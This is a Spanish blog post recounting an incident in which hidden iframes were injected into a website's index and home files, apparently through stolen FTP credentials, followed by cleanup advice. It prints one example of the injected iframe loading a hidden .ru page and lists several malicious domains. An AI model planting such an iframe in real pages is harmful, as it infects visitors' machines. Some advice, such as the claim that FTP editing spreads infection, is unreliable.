Crónica de una cuasi tragedia.
- Viernes por la mañana una página muestra unas líneas en blanco antes del contenido habitual de la misma.
- Upload de los archivos y problema solucionado
- Viernes por la tarde un archivo que no se había modificado en meses dá un error de código en la linea 246.
- Upload del backup y problema solucionado
- Minutos después nuevamente espacios en blanco, error en línea 246 y la terrible noticia. El antivirus me dice que mi sitio me quiere atacar, a mí, justo a mi, que lo crié de protrillo.
Aca fue cuando decidí dejar de tomarlo como un error y buscar donde estaba el problema y encontré un código inyectado en todos los index.xx y home.xxx de todas las carpetas sitio.
Específicamente en la etiqueta
<body> o inmediatamente después apareció un iframe que trataba de cargar dentro una web. El código aparecido es similar a esto <iframe src=”http://loquesea.ru:8080/index.php” width=125 height=125 style=”visibility: hidden”>. El dominio loquesea.ru, pero a modo de ejemplo estos son alguno d elso dominios reales que aparecieron: u5m.ru:8080 | u1j.in:8080 |u5m.ru:8080 |x8o.ru:8080 |xt7.ru:8080 |39v.ru:8080 y kmuchos otros.
Luego de leer mucho y trabajar con mi sysadmin un largo rato llegué a la conclusión el ingreso fue via FTP por una PC infectada en mi oficina, ya que las otras posibilidades son que se suba por medio de un Form de Upload o por un Administrador de Contenidos con una falla de seguridad pero ninguna de esas dos cosas tiene el sitio.
Solución y recomendaciones:
LO MEJOR: Si tenemos el backup del sitio entero, pues eliminar la cuenta y volver a crear y luego subir todo nuevamentey crear nuevamente bases de datos y cuentas de email.
Cómo ésto no siempre es posible, entonces debemos eliminar todos los index.xxx y home.xxx del sitio y reemplazarlos por los backups o editarlos online para eliminar ese código. Esta edición debe ser via HTTP y no via FTP ya que los FTP hacen un download temporal del archivo y eso infectaría nuestra máquina.
Además debemos cambiar el passwords del FTP y de los administradores de contenidos y por supuesto eviatr los virus en nuestras máquinas teniendo especial cuidado cuando hacemos click algo que viene de una wev y POR SUPUESTO mantener las máquinas con antivirus actualziados.
IMPORTANTE:
Si por algun motivo se va a demorar mucho tiempo en arreglarlo, lo ideal es suspender la cuenta hasta tanto la solución no sea inmediata ya que si nuestro sitio es detectado como dañino, es probable que una vez limpio a los navegantes se les informe mediante una pantalla que dicho site infecto X cantidad de sitios y máquinas.
Google ya sea mostrando uan bes desde los resultados o tratando de acceder a ella desde Chrome muestra esto antes de la web si es que la misma fue detectada. http://google.com/safebrowsing/diagnostic?site=x8n.ru/&hl=es.
Quizás los antivirus de cada navegante ayuden a que la infección de un site no pase a todas las máquinas, pero lo mas probable es que ante el menor error dejarán de visitas la web.
Agregado 21/9/9: Si el visrus despues de un tiempo vuelve a aparecer, la solución definitiva que encontré fue borrar el hosting y después volver a crearlo. Solo así nos aseguramos que el virus se haya eliminado totalmente de todas las carpetas.
Por ahora nada más sobre el tema, solo que la limpieza total fue hace horas y parece haber funcionado perfectamente. |
malware 
